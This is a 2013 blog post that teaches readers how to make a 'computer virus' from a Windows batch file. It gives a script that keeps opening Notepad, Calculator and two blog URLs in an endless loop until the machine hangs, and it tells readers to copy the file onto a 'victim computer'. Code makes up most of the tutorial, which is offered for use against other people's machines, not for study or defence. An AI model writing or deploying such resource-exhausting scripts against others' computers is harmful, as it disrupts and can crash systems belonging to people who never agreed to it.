Saturday, 17 August 2013

How to make a Computer Virus

batch file is a  text file with the file extension .bat, which is interpreted by the command processor, i.e
M.S Dos.
It contain  some set of commands which is executed automatically when some one click on the file.. so it very easy to make virus by using batch file..

 Now i am going to tell you how to do such stuffs..

 How to make a  Computer Virus?

Ans:for this you must know some of the basics command like. echo,start ,pause, kill ,call etc

Step1 :- open Notepad
Step2:-  copy the following code.
@echo off
:d
start  notepad
start   www.langadda.blogspot.com
start   www.toolsadda.blogsspot.com
start   calc
goto :d

Step 3:- save the file with bat extension. name could be anything.
Step 4:- Now copy this bat file and paste it on victim  computer.

 NOTE:-Don't click the file otherwise this code will hang your PC 

You can make it more complex by inserting some more command with in the label. 

start command will run the applications mentioned .i.e notepad ,calculater,browser. etc
:d is a label.
goto is used to jump the interpreter over the label.


 For any doubt pl z comment...

Related Posts:

  • Top 5 different ways by which user can store online data for free 1.Sky Drive :is online free storage for storing data .It provides the      user to store data above 5+Gb for free.Sky Drive is now days         providing store of online data for… Read More
  • MS office for Andriod Finally Microsoft has  decided to launch its Office 365 for Android. The software was out since 31 July and its costs a $100-a-year for subscription and it not to be sold separately.  As far now it i… Read More
  • Google Maps is now most widely app Google Maps is now most widely used in worlds according to Global Web Index with the Percentage of 54.Facebook holds second position with 44% followed by You tube and Google+. Skype is at & positi… Read More
  • Find My Phone for Andriod After a long journey for four years finally Google  launched an Android equivalent to Apple's ,find my phone app ,which is used to track down  missing phone or tabs. The Apple's user using this app since 2009 … Read More
  • How to make a Computer Virus A batch file is a  text file with the file extension .bat, which is interpreted by the command processor, i.e M.S Dos. It contain  some set of commands which is executed automatically when some one click… Read More

0 comments:

Post a Comment